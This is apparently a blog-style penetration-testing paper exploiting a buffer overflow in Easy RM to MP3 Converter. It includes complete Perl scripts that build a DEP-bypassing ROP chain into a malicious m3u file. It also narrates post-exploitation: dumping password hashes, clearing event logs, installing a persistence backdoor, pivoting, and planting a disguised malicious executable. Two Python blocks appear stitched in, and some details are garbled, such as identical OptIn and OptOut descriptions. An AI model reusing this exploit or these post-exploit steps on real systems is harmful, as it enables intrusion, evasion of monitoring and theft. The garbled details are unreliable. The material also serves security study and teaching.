Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
This is my first arti

Penetration Testing for Easy RM to MP3 Converter Application & Post Exploit

Author: JongWon Kim
dikien2012@gmail.com
http://dikien2012.blogspot.com
Table of Contents

Penetration Testing for Easy RM to MP3 Converter Application ... 1
Table of Contents ... 2
Abstract ... 3
Setting up the Testing Environment ... 4
Strategy for the Application Testing ... 5
Dynamic Analysis ... 6
Strategy for the Post Exploit ... 15
Post Exploit ... 16
Conclusion ... 21
Abstract

Advanced persistent attacks now threaten our valuable assets. New exploits that threaten end users and corporations are researched every day. No matter how well the operating system's protection mechanisms work, privilege escalation can be easy because of a single vulnerable application. Many corporations defend their information with firewalls, WAFs and SLBs, but one vulnerable application can render these powerful protection lines useless. In this paper I analyse such an application and suggest a solution within a Windows environment.

This is the imaginary scenario for this paper. My client reports that 'Easy RM to MP3 Converter' sometimes exits when opening an m3u file that contains an overly long string. First, I find that this application has a stack-based buffer overflow vulnerability, and I build a ROP-based exploit to test it. Second, I attack the machine running the application with that exploit and carry out post-exploitation.
Setting up the Testing Environment

• Backtrack5 R1 (attack machine, 192.168.10.10)
• Windows SP2 (first victim, for the application penetration testing, 192.168.10.5, 10.10.10.5)
• Windows SP3 (second victim, for the pivot, 10.10.10.20)
• Immunity Debugger 1.83
• Easy RM to MP3 Converter (2.7.3.700, the vulnerable application)
• Metasploit Framework
• Social Engineering Toolkit
• ALFTP 5.22

Testing environment explanation: the default DEP (Data Execution Prevention) setting for Windows SP2 is OptIn (all programs, processes and services on the Windows system are protected, except for processes in the exception list). Before starting the penetration test, I manually changed it to OptOut by adding '/noexecute=policy' to the end of the line that refers to the OS boot configuration. With the OptOut option, all programs, processes and services on the Windows system are protected, except for processes in the exception list. There is no exception list for this testing.
Strategy for the Application Testing

I use one of the Windows API functions, VirtualProtect(), to bypass DEP. This function changes the access protection of a given memory page, which allows me to make the location where my payload resides executable. I first have to set up the stack with the correct parameters for that function. I cannot overwrite the return address directly with my payload or use SEH chains, because with DEP in OptOut mode the payload will not be executed on the stack. Below is the prototype of VirtualProtect():

    BOOL WINAPI VirtualProtect(
        __in  LPVOID lpAddress,
        __in  SIZE_T dwSize,
        __in  DWORD  flNewProtect,
        __out PDWORD lpflOldProtect
    );

• Return address: the address VirtualProtect() returns to, which must point to the location of the payload on the stack.
• lpAddress: a pointer to an address that describes the starting page of the region of pages whose access protection attributes are to be changed.
• dwSize: the size of the region whose access protection attributes are to be changed, in bytes.
• flNewProtect: the new protection option; 0x00000040 is PAGE_EXECUTE_READWRITE.
• lpflOldProtect: a pointer to a variable that will receive the previous access protection value.
Dynamic Analysis

First, I calculate the offset between the registers and the buffer: the Perl script below builds a crafted m3u file, and I open that file with the application running under the debugger. Below is the source code that creates the m3u file.

==================================================================
my $file = "exploit.m3u";
my $junk = "\x41" x 26058;
$junk = $junk . "XXXX";
my $eip = "BBBB";              # This will overwrite EIP
my $nops = "\x90" x 240;
my $shellcode = "";
my $rest = "C" x 300;
my $payload = $junk.$eip.$nops.$shellcode.$rest;
print "Payload size : ".length($payload)."\n";
print "Shellcode size : ".length($shellcode)."\n";
open(my $FILE, ">", $file) or die "Cannot open $file: $!";
print $FILE "$payload";
close($FILE);
print "m3u File Created successfully\n";
==================================================================

[ Figure 1. EIP is overwritten with BBBB ]
42424242 is the hexadecimal representation of BBBB. Another way to find the offset is mona.py, by issuing the command '!mona pattern_create 3000' in the debugger. I add this unique pattern to the script.

==================================================================
my $file = "exploit.m3u";
my $junk = "\x41" x 26000;
my $pattern = "";              # msf unique pattern goes here
my $nops = "\x90" x 240;
my $shellcode = "";
my $rest = "C" x 300;
my $payload = $junk.$pattern.$nops.$shellcode.$rest;
print "Payload size : ".length($payload)."\n";
print "Shellcode size : ".length($shellcode)."\n";
open(my $FILE, ">", $file) or die "Cannot open $file: $!";
print $FILE "$payload";
close($FILE);
print "m3u File Created successfully\n";
==================================================================

After the crash, I get more useful information with the command '!mona suggest'. On top of that, I check whether the payload is corrupted with the command !mona compare -f "C:\Documents and Settings\Administrator\바탕 화면\RM2MP3Converter\pattern.txt". I generate gadgets for the ROP chain with the command '!mona rop -n -cm aslr=false,safeseh=false,rebase=false'. After the ROP chain has run, EIP will point to the shellcode that I want executed. I made the shellcode with msfpayload and msfencode and added it to the script to create the final exploit m3u file.

[ Figure 2. Making a payload that connects back to the attacker machine ]

My final exploit is below.

Stage-1: Save the stack pointer to the EAX and EDI registers and jump over the parameters.
Stage-2: Craft the parameters, i.e. set up the arguments of a function that allows me to disable or bypass DEP.
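The offset-finding step above (pattern_create, then reading the crashed register) can be reproduced without mona for crash triage. The following Python is an added example, not code from the paper: it builds the same Aa0Aa1... cyclic pattern and maps a register value such as 0x42424242 back to its offset in the input; the function names and the sample crash value 0x37634136 are my own.

```python
"""Crash triage with a cyclic pattern (the '!mona pattern_create' step).

Added example, not part of the original paper.  Builds the Metasploit-style
pattern and maps a crashed register value back to its offset in the input.
"""
import string
import struct
from typing import Optional, Union


def pattern_create(length: int) -> str:
    """Return the first `length` characters of the cyclic pattern Aa0Aa1Aa2...Zz9.

    Every 4-byte window is unique for the first 20280 bytes, so the 4 bytes
    that land in a register identify exactly where in the file they came from.
    """
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def register_to_bytes(value: int) -> bytes:
    """A 32-bit x86 register holds its bytes little-endian: EIP=0x42424242 means
    the bytes 'BBBB' were loaded in that order from the crashing input."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def pattern_offset(pattern: str, value: Union[int, str]) -> Optional[int]:
    """Offset of `value` (a register value or a 4-character string) in `pattern`,
    or None when the value did not come from the pattern (e.g. 0x42424242)."""
    needle = register_to_bytes(value).decode("latin-1") if isinstance(value, int) else value
    idx = pattern.find(needle)
    return idx if idx >= 0 else None


if __name__ == "__main__":
    pat = pattern_create(3000)          # same length as used with mona in the text
    # Constructed crash value for illustration: EIP = 0x37634136 -> "6Ac7" -> offset 80
    print("offset of crash value:", pattern_offset(pat, 0x37634136))
    print("control bytes:", register_to_bytes(0x42424242))   # b'BBBB'
```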
==================================================================
my $file = "exploit.m3u";
my $junk = "\x41" x 26064;
my $eip = pack('V', 0x7C84483D);               # RETN from kernel32.dll
my $junk2 = "AAAA";                            # Compensate for

########### Stage-1 started here ###########
########### Put stack pointer in EDI & EAX ###########
my $rop = pack('V', 0x5a489ee7);               # PUSH ESP // MOV EAX,EDX // POP EDI // RETN from uxtheme.dll
$rop = $rop.pack('V', 0x77bce842);             # PUSH EDI // POP EAX // POP EBP // RETN from msvcrt.dll
$rop = $rop."AAAA";                            # Compensate for
$rop = $rop.pack('V', 0x1001653D);             # ADD ESP,20 // RETN from MSRMfilter03.dll

########### Parameters for VirtualProtect() ###########
my $parameters = pack('V', 0x7C801AD0);        # Address of VirtualProtect()
$parameters = $parameters."WWWW";              # Return address
$parameters = $parameters."XXXX";              # lpAddress
$parameters = $parameters."YYYY";              # dwSize
$parameters = $parameters."ZZZZ";              # flNewProtect
$parameters = $parameters.pack('V', 0x10035005);   # Writeable address (lpflOldProtect)
$parameters = $parameters.("H" x 8);           # Padding
########### Stage-1 finished ###########

########### Stage-2 starts below ###########
########### First parameter ###########
my $rop2 = pack('V', 0x77427175);              # XCHG EDI,ESI // RETN 8
########### Make EAX point at the shellcode ###########
$rop2 = $rop2.pack('V', 0x1002DC4C);           # ADD EAX,100 // POP EBP // RETN from MSRMfilter03.dll
$rop2 = $rop2."AAAA";                          # Padding - compensate for RETN 8
$rop2 = $rop2."AAAA";
$rop2 = $rop2."AAAA";
########### Second parameter, RETN is in EAX ###########
$rop2 = $rop2.pack('V', 0x77D944C4);           # MOV DWORD PTR DS:[ESI+10],EAX // MOV EAX,ESI // POP ESI // RETN
$rop2 = $rop2."AAAA";                          # Padding
########### EAX now contains the stack pointer ###########
$rop2 = $rop2.pack('V', 0x76A602BC);           # PUSH EAX // POP ESI // RETN
########### Make EAX point at the shellcode again ###########
$rop2 = $rop2.pack('V', 0x1002DC4C);           # ADD EAX,100 // POP EBP // RETN
$rop2 = $rop2."AAAA";                          # Padding
########### Increase ESI by 4 ###########
$rop2 = $rop2.pack('V', 0x5C83F948);           # INC ESI // RETN from comctl32
$rop2 = $rop2.pack('V', 0x5C83F948);
$rop2 = $rop2.pack('V', 0x5C83F948);
$rop2 = $rop2.pack('V', 0x5C83F948);
########### Write lpAddress ###########
$rop2 = $rop2.pack('V', 0x77D944C4);           # MOV DWORD PTR DS:[ESI+10],EAX // MOV EAX,ESI
$rop2 = $rop2."AAAA";                          # Padding

########### Save EAX in ESI again ###########
$rop2 = $rop2.pack('V', 0x76A602BC);           # PUSH EAX // POP ESI // RETN
########### Create size: set EAX to 300 or so ###########
$rop2 = $rop2.pack('V', 0x76A5D8EC);           # XOR EAX,EAX // RETN
$rop2 = $rop2.pack('V', 0x1002DC4C);           # ADD EAX,100 // POP EBP // RETN
$rop2 = $rop2."AAAA";                          # Padding
$rop2 = $rop2.pack('V', 0x1002DC4C);           # ADD EAX,100 // POP EBP // RETN
$rop2 = $rop2."AAAA";                          # Padding
$rop2 = $rop2.pack('V', 0x1002DC4C);           # ADD EAX,100 // POP EBP // RETN
$rop2 = $rop2."AAAA";                          # Padding
########### Write size; first set ESI to the right place ###########
$rop2 = $rop2.pack('V', 0x5C83F948);           # INC ESI // RETN from comctl32
$rop2 = $rop2.pack('V', 0x5C83F948);
$rop2 = $rop2.pack('V', 0x5C83F948);
$rop2 = $rop2.pack('V', 0x5C83F948);
########### Third parameter ###########
$rop2 = $rop2.pack('V', 0x77D944C4);           # MOV DWORD PTR DS:[ESI+10],EAX // MOV EAX,ESI
$rop2 = $rop2."AAAA";                          # Padding
########### Save EAX in ESI again ###########
$rop2 = $rop2.pack('V', 0x76A602BC);           # PUSH EAX // POP ESI // RETN
########### flNewProtect 0x40 ###########
$rop2 = $rop2.pack('V', 0x76A5D8EC);           # XOR EAX,EAX // RETN
$rop2 = $rop2.pack('V', 0x1002DC41);           # ADD EAX,40 // POP EBP // RETN

$rop2 = $rop2."AAAA";                          # Padding
$rop2 = $rop2.pack('V', 0x5C83F948);           # INC ESI // RETN from comctl32
$rop2 = $rop2.pack('V', 0x5C83F948);           # INC ESI // RETN from comctl32
$rop2 = $rop2.pack('V', 0x5C83F948);           # INC ESI // RETN from comctl32
$rop2 = $rop2.pack('V', 0x5C83F948);           # INC ESI // RETN from comctl32
########### Fourth parameter ###########
$rop2 = $rop2.pack('V', 0x77D944C4);           # MOV DWORD PTR DS:[ESI+10],EAX // MOV EAX,ESI // RETN
$rop2 = $rop2."AAAA";                          # Padding
########### Return to the VirtualProtect pointer; compensate for 2 POP instructions ###########
$rop2 = $rop2.pack('V', 0x76A6028F);           # SUB EAX,4 // RETN
$rop2 = $rop2.pack('V', 0x76A6028F);           # SUB EAX,4 // RETN
########### Change ESP & back to the origin ###########
$rop2 = $rop2.pack('V', 0x73D35CA8);           # PUSH EAX // POP ESP // MOV EAX,EDI // POP EDI // POP ESI // RETN from MFC32.dll

my $nops = "\x90" x 240;
my $shellcode = "";    # reverse-connect payload generated with msfpayload/msfencode (Figure 2); hex bytes not reproduced here
my $rest = "C" x 300;
my $payload = $junk.$eip.$junk2.$rop.$parameters.$rop2.$nops.$shellcode.$rest;
print "Payload size : ".length($payload)."\n";
print "Shellcode size : ".length($shellcode)."\n";
open(my $FILE, ">", $file) or die "Cannot open $file: $!";
print $FILE "$payload";
close($FILE);
print "m3u File Created successfully\n";
==================================================================

Since the shellcode connects back to the BackTrack machine, I use multi/handler in msfconsole to listen on TCP port 4444.

[ Figure 3. Listening on TCP port 4444 ]
I create the m3u file with the script above and open it with the application.

[ Figure 4. Opening exploit.m3u to crash the application ]

I get a Meterpreter shell from the first victim machine.

[ Figure 5. Getting the Meterpreter shell from the first victim machine ]
Strategy for the Post Exploit

1. Understanding the victim better
2. Privilege escalation
3. Deleting logs and killing monitoring software
4. Collecting data and executing programs
5. Backdoors and rootkits
6. Using victims as a pivot to hack deeper into the network
Post Exploit

1. Understanding the victim better

[ Figure 5. Network Information ]

I obtain the password hashes and can crack them with John the Ripper. If I cannot recover the original passwords, I can use the pass-the-hash technique, which requires only the password hash, not the password itself.

[ Figure 6. Password Hashes ]

I can also look for more vulnerable applications, available tokens and the routing table.

[ Figure 7. Token Lists ]
[ Figure 8. Running applications ]

[ Figure 9. Routing Table ]

I notice this machine is running ALFTP, which will be used in the social engineering attack.

[ Figure 10. ALFTP is running ]

2. Privilege escalation

After getting system, I safely migrate into 1072 (svchost.exe) via technique 1.

[ Figure 11. Privilege Escalation Success ]
3. Deleting logs and killing monitoring software

I try to kill the anti-virus software, but there is none, and I clear the event logs.

[ Figure 12. Killing AV and deleting event logs ]

4. Collecting data and executing programs

[ Figure 13. Collecting txt files ]

5. Backdoors and rootkits

I run persistence and tell Windows to auto-start the agent at boot time, wait 100 seconds between connection retries, run on port 443 and connect to IP 192.168.10.5.

[ Figure 14. Installing the Backdoor ]
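The persistence agent above retries its connection on a fixed 100-second timer, and that regular cadence is what a defender can hunt for in outbound connection records. The following Python is an added example, not part of the paper: it groups connections by source, destination and port and flags groups whose inter-connection gaps are nearly constant. The log lines are constructed, with the first victim as the source and the placeholder address 198.51.100.7 standing in for the handler.

```python
"""Spot fixed-interval outbound beaconing in connection records.

Added example, not part of the original paper.  A persistence agent that
retries on a timer (here: every 100 s to port 443) produces nearly constant
gaps between connections; irregular user traffic does not.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample records ("timestamp src dst dport"), not real logs.
# 198.51.100.7 is a placeholder handler address, not from the paper.
SAMPLE_LOG = """\
2012-03-01T10:00:00 192.168.10.5 198.51.100.7 443
2012-03-01T10:00:37 192.168.10.5 192.168.10.9 80
2012-03-01T10:00:39 192.168.10.5 192.168.10.9 80
2012-03-01T10:01:41 192.168.10.5 198.51.100.7 443
2012-03-01T10:02:55 192.168.10.5 192.168.10.9 80
2012-03-01T10:03:20 192.168.10.5 198.51.100.7 443
2012-03-01T10:03:21 192.168.10.5 192.168.10.9 80
2012-03-01T10:05:00 192.168.10.5 198.51.100.7 443
2012-03-01T10:06:41 192.168.10.5 198.51.100.7 443
"""


def parse_log(text):
    """Yield (timestamp, src, dst, dport) from the sample format; skip blank lines."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        yield datetime.fromisoformat(ts), src, dst, int(dport)


def find_beacons(records, min_connections=4, max_jitter=0.10):
    """Return {(src, dst, dport): mean_gap_seconds} for connection groups that
    repeat at least `min_connections` times with a coefficient of variation
    (stdev / mean of the gaps between connections) no larger than `max_jitter`."""
    groups = defaultdict(list)
    for ts, src, dst, dport in records:
        groups[(src, dst, dport)].append(ts)
    beacons = {}
    for key, times in groups.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        # A timer-driven retry has almost no jitter; the port-80 browsing above does.
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons[key] = avg
    return beacons


if __name__ == "__main__":
    for (src, dst, dport), gap in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(f"{src} -> {dst}:{dport} every ~{gap:.0f} s")
```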
6. Using victims as a pivot to hack deeper into the network

I find that the first victim machine has two network cards on different subnets; the second subnet is an inner network disconnected from the outside. I go inside through a tunnel over the first victim machine.

[ Figure 15. Setting routing table ]

[ Figure 16. Running scan via session 1 ]

I learn that the second victim machine (10.10.10.20) has port 139 open, which means it could be vulnerable to 'MS08-067'.

[ Figure 17. Port Scan ]

I make a malicious file with a fake name (alsong.exe) that connects back to the attacker machine with a Meterpreter shell. I find the FTP server's working directory on the first victim machine and upload the file there.

[ Figure 18. Uploading the malicious file ]
I check that the malicious file is on the FTP server. The second victim downloads and executes it.

[ Figure 19. Uploading the malicious file ]

A new session is created from the second victim machine.

[ Figure 20. Attack success on the second victim machine ]
Conclusion

I showed that a vulnerable application can threaten the inner intranet. The latest OS protection mechanisms, firewalls and SLBs cannot always protect our assets. It is vital not only that developers practise secure coding to prevent attacks such as buffer overflows or heap sprays, but also that end users are security conscious: they should not use applications they do not need for work, and they should always keep their software up to date. It is obvious that essential databases should be kept completely away from ordinary staff. As is frequently pointed out, we should keep in mind that an attack can come from inside.